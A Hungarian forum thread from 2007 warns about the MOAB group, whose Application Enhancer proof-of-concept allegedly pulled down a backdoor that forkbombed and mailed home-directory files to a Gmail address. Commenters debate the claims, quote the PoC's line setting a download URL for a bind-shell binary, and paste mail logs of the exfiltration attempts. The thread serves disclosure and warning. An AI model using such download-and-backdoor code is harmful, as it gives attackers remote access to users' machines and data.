MOAB figyelmeztetés

macOS

Mivel nem mindenki követi teljes figyelemmel a MOAB trollok (LMH, Kevin Finisterre) körül zajló eseményeket, így kénytelen vagyok én kiadni egy figyelmeztetést: mindenki nagy ívben kerülje őket, illetve az általuk letöltésre felajánlott programokat.

Amellett, hogy az Application Enhancer nevű third party szoftverben talált hibára kiadott PoC kódjuk (automatikusan letöltődő és reboot után elinduló része) valójában egy kis forkbomb mellett a felhasználó home könyvtárának bizonyos részeit küldi el egy gmail-os accountra (mindkettő undocumented feature), a napokban kiderült, hogy a Colloquy nevű IRC kliensben talált hibával a #macdev IRC csatornát több ízben megtámadták, majd dicsekvésképp az ezt igazoló log-ot beleírták az advisoryba (később ezek a bizonyítékok eltávolításra kerültek).

Miután ez az LMH nevű ircharcos a MOAB Fixes levelezőlistán elolvasta, hogy fény derült gyermeteg csínytevésére, először hazugsággal vádolta meg a tagokat, majd a nyomaték kedvéért egy kis fenyegetéssel is megtoldotta értékes kontribúcióját. Ezután szembesítették az archivált advisoryval.

Don't feed the troll.

( MrCrowley | 2007. 01. 19., p – 09:48 )

MOAB: gyenge kezdés után erös visszaesés.

( tolmi | 2007. 01. 19., p – 10:19 )

Én nem hiszek neked Gabu. Sőt Rosyna-nak sem. Ő is alig várta már, hogy valami kis kapaszkodót találjon a MOAB-on és végre szanaszét FUD-olhassa ezt is. Most te segítesz neki. Én azt hittem, hogy értelmes ember vagy és neked is az a célod, hogy a te favorit architektúrád szoftverei egyre biztonságosabbak legyenek. Valamint vagy már annyira öreg, hogy belátsd, egy rendszer nem lehet tökéletes. Még akkor sem, ha azt történetesen páter Jobs áldja meg minden reggel szenteltvízzel.
Amit belinkeltél "tényekként", azokat alaposan végigolvasva sajnos nem leltem semmit, ami bizonyíték lenne arra amit mondasz. Szerintem valami G. Bérzci volt, csak felvette a nevét Mr. K. Finisterre-nek, hogy végre elérje a célját és FUD-olhasson a MOAB-bal kapcsolatban.
A másik gonosztettükről nem is leltem írást a Gugli segítségével, szóval akkora hír nem lehetett->ez is vihar egy pohár vízben.
Tessék érdemi tényeket elénk hozni, addig csak egy troll vagy te is a sok közül. Köszönöm!

(Ui.: Ha mégis igaz lenne az AppEnhancer gonoszság, amiről nem leltem eddig semmit, akkor is azt mondanám, hogy jól tették, hogy ilyet csináltak, aki lefuttat a gépén egy ilyen programot és nem olvassa el a kódját a cuccnak, az teljesen hülye, már elnézést. Az futtassa, aki tud is tenni valamit a hiba ellen, vagy felkérték megerősítésre és bízik a felkérő partnerben. Ha bárki más lefuttatja tudván hogy mit csinál a PoC, az egyszerűen Windózjuzer vagy úgy látszik mostmár mekkjuzer. r=1 )
--
% make love
Make: Don't know how to make love. Stop.

Igy van, a rendszerek tokeletessegerol eleg hatarozott elkepzelesem van, illuziok nelkul. Az emlitett mailinglist-en olvasottak engem meggyoztek. Az AppEnhancer malicsuszkod letezik, ez a PoC tolti le, innen:


BACKDOO_URL = "http://projects.info-pull.com/moab/bug-files/sample-back" # must be fat binary, sample bind shell

A kodjat meg nem nagyon lehet elolvasni, leven binaris, es szabad szemmel a reboot utan felbukkano malicsusz stringek sem talalhatoak meg benne, tehat obfuszkat :)

Ó. De akkor ezt nem változtatták meg KF-ék? :) Mert biztos megijedtek hogy mások is rájöttek eme egyszerű és gyerekesen naiv kis trükkjüre, szóval már biztos nem az eredeti malicsusz kód van fent... :D Áááá, plíííz. Továbbra sem érzem annyira súlyosnak a kérdést. A juzer hülyesége ellen semmi nem véd. Én nem KF-éket okolnám azért mert ilyet csináltak, hanem az r=1 -eket...
--
% make love
Make: Don't know how to make love. Stop.

Ó. De akkor ezt nem változtatták meg KF-ék? :)

lehet hogy (szar) viccnek szantad, de mint kiderult megis igy van

Mert biztos megijedtek hogy mások is rájöttek eme egyszerű és gyerekesen naiv kis trükkjüre, szóval már biztos nem az eredeti malicsusz kód van fent... :D Áááá, plíííz.

pliz what?

Szerintem meg az a nagy budos - ha a fentiek igazak, viszont rettenetesen nincs kedvem utana nezni, es teljesen mindegy, hogy mi a vizsgalat targya, legyen szo OSX-rol, linuxro, *BSD-rol, stb. - hogy magukat es a csoportot jaratjak le azzal, hogy egy ilyen akcio kereteben adatokat gyujtenek a felhasznalokrol, ami valoszinuleg nem azert keszul, mert jotet lelkek. Ezzel az egesz projectjuk a kozrohej szintjere sullyed, amig rendbe nem hozzak a megtepazott hirnevuket. Es ha a fentiek meg csak nem allnak meg - mivel nem neztem utana, igy a lehetosege reszemrol fent all - akkor is marha nehez lesz kimosniuk magukat.

Lehet, hogy szanalmas az, hogy probalnak kapaszkodot keresni benne, de megszanalmasabb amit az a fereg csinalt. Es ez nekik tobbet art, mint az OSX-nek. Es a legszanalmasabb, hogy valaki guglit hozza fel bizonyitekkent arra, hogy az egesz csak FUD, ahelyett, hogy lerantana a kerdeses anyagokat (ill. azok eredeti verzioit), es megvizsgalna oket. Nem eloszor fordult elo a vilagtortenelemben, hogy valaki hasonlo modszerrel probalkozik, mint a PoC.

---
pontscho / fresh!mindworkz

Mondtam én hogy a Gugli bizonyíték bármire? :) Sem negatívban, sem pozitívban. De mivel Gabu is kb ennyire megbízható bizonyítékokat adott kiindulásnak, meg mertem kockáztatni hogy párba állítom a "bizonyíték-lelőhelyeit" a Guglival. Másik meg nem biztos hogy én tökéletesen keresek. Ezért simán lehet nem leltem meg, pedig ott volt az orrom előtt.
Mind1. Nekem ez szemlélet kérdése: én hiszek az ártatlanság vélelmében. Nekem ez mindennél fontosabb. Ettől (is) érzem magam civilizált embernek.

--
% make love
Make: Don't know how to make love. Stop.

>> Nekem ez szemlélet kérdése: én hiszek az ártatlanság vélelmében. Nekem ez mindennél fontosabb.

kicsit össze kéne szedni a végleges álláspontod, mert az előbb még azon lovagoltál, hogy valóban ott a malicsuszkód, de szopjanak csak a népek

>> Ettől (is) érzem magam civilizált embernek.
nc

Abszolút nem látom, hogy hol mondtam ezt, valamint ha ezt mondtam volna, miért ütközne az artatlanság vélelmébe vetett hitemmel. Az hogy valaki hülye, nem jelenti sem azt hogy bűnös, sem azt hogy ártatlan. Az hülye. Futtasson PoC-ot. Mert megérdemli. Figyelem! Nem egy új szmájlikat felrakó proginak hirdette magát hanem egy adatszivárogtatás PoC volt. Ezek után miért meglepő mindez, ha valaki tudja is hogy mit csinál a progi? Oda volt írva, hogy mire PoC. A hülyeség és a bátorság a világ romlásának biztos elhozói.
--
% make love
Make: Don't know how to make love. Stop.

Szerintem meg az a nagy budos - ha a fentiek igazak, viszont rettenetesen nincs kedvem utana nezni, es teljesen mindegy, hogy mi a vizsgalat targya, legyen szo OSX-rol, linuxro, *BSD-rol, stb. - hogy magukat es a csoportot jaratjak le azzal, hogy egy ilyen akcio kereteben adatokat gyujtenek a felhasznalokrol, ami valoszinuleg nem azert keszul, mert jotet lelkek. Ezzel az egesz projectjuk a kozrohej szintjere sullyed, amig rendbe nem hozzak a megtepazott hirnevuket. Es ha a fentiek meg csak nem allnak meg - mivel nem neztem utana, igy a lehetosege reszemrol fent all - akkor is marha nehez lesz kimosniuk magukat.

Lehet, hogy szanalmas az, hogy probalnak kapaszkodot keresni benne, de megszanalmasabb amit az a fereg csinalt. Es ez nekik tobbet art, mint az OSX-nek. Es a legszanalmasabb, hogy valaki guglit hozza fel bizonyitekkent arra, hogy az egesz csak FUD, ahelyett, hogy lerantana a kerdeses anyagokat (ill. azok eredeti verzioit), es megvizsgalna oket. Nem eloszor fordult elo a vilagtortenelemben, hogy valaki hasonlo modszerrel probalkozik, mint a PoC.

---
pontscho / fresh!mindworkz

Igazabol a dolog rendkivul egyszeruen eldontheto: fogod a forrast es belenezel (binaris eseten: fogod a disassemblert, es belenezel). Ennyi. Es itt most (kivetelesen?) Gabucino-nak igaza van.
Az igaz, hogy aki akarmit csak ugy lefuttat a gepen, (nemcsak PoC exploitot, akarmit), annak nem szamitogep valo, hanem szines fakockak, viszont az ilyesmi attol fuggetlenul (hogy egy klasszikust idezzek) "bunko, tirpak dolog".

( manoe | 2007. 01. 19., p – 10:20 )

Engem is meglepett már az elejétől fogva az a hozzáállás, ahogy emberek egyre-másra próbálgatták a MOAB-féle exploitokat/PoC-okat, miközben azok valós tartalmáról fogalmuk sem volt.

( tr3w v | 2007. 01. 19., p – 13:46 )

Először is, ha valaki PoC exploitokat indítgat el éles rendszeren, csak, hogy megnézze tényleg működik-e, az nyilván hülye, és megérdemli.

Másrészről, aki egy PoC kódba belerak olyasmit ami nincs dokumentálva az meg minimum etikátlan.

Kár érte...

"...handing C++ to the average programmer seems roughly comparable to handing a loaded .45 to a chimpanzee."
-- Ted Ts'o

( Gabucino | 2007. 01. 19., p – 13:59 )

egyebkent itt irtam hogy mit futtat a binaris. Ez a komment 9.-ei (az advisory meg 8.), viszont a most letoltheto backdoor datuma januar 10, szoval akar mar ki is vehettek, mindenesetre ezt mar le se tudom futtatni APE-vel szoval nehez ellenorizni :)

ja, es ezt forkbomb-szeruen, igy: 

2007-01-09 12:11:52 JBLLPL-0003MT-D9 == maczealotpwn@gmail.com R=dnslookup defer (-1): host lookup did not complete
2007-01-09 12:11:53 JBLLPL-0003NJ-KX == maczealotpwn@gmail.com R=dnslookup defer (-1): host lookup did not complete
2007-01-09 12:11:57 JBLLQC-0003SZ-7W == maczealotpwn@gmail.com R=dnslookup defer (-1): host lookup did not complete
2007-01-09 12:12:00 JBLLPR-0003R4-C7 == maczealotpwn@gmail.com R=dnslookup defer (-1): host lookup did not complete
...

Es egy detailed elemzese a backdoornak.

MOAB-osok artatlansaga? kthxbye

Nah, jóvan. Zárjuk rövidre. Az én állásfoglalásom e kérdésben, hogy nem állítható teljes biztonsággal hogy valóban adatot loptak, másrészről tökéletesen etikátlan viselkedés a részükről, ha így történt. Mégsem tudok rájuk haragudni, mert mint írtam ha valaki hülye és bátor egyszerre, az pusztuljon ki önszántából. Kérem. Elég lammer van így is, nem fognak ráférni a 4. spaceship-re :D
--
% make love
Make: Don't know how to make love. Stop.

Az egy olyan tézise a jogrendszernek, amellyel orrba-szájba vissza lehet élni. Igen, tézis. Mivel nincs valóságalapja, hanem tetszés szerint ferdített valóság = ráutaló magatartás. Bloá. Bemegyek egy bankba bomberdzseki-napszemüveg zárjanak le mert ráutaló magatartást tanusítottam tk. hoyg kirámolom a bankot? Mert már itt tartunk kb. thx to counter-terrorism.
--
% make love
Make: Don't know how to make love. Stop.

"Bemegyek egy bankba bomberdzseki-napszemüveg zárjanak le mert ráutaló magatartást tanusítottam"..ha elővetted a stukkert is.

Egyébként senki nem mondta hogy a jogrendszer tökéletes, de azért elég nagy naivitás azt hinni hogy teszem azt a kedves bácsi aki az imént benyomta a fürdőszoba ablakot és bemászott csak ajándékot hozott és Ő a Mikulás. Tehát lehet hogy a fent említett urak _még_ nem tették meg amit szerettek volna, de ha nem füleljük őket akkor rohadtul ne csodálkuzzunk ha egyszer csak valami nem lesz frankó. :)

Hehe..
Soha nem szerettem a motor mellet "öltözködni", mire odaérek már rajtam a sisak kesztyű... egyszer éppen jöttem ki a bankból amikor a két üvegajtó között a fejembe nyomtam a sisakot... egy nő éppen akkor jött be a külsőn... ha láttatok már igazán rémült arcot, akkor az olyan volt. :-))

Udv:
Feri

Milyen lehangoló lehetett aztán bemenni és látni hogy nem is történt semmi. ;)

Egyébként volt szerencsém átélni egy ékszerboltrablást (nem mint rabló :) ), na ott az eladó akkorát sikított hogy aszittem behugyozok. Mire felocsúdtam a rosszarcú már félig a kocsiban volt. :) :(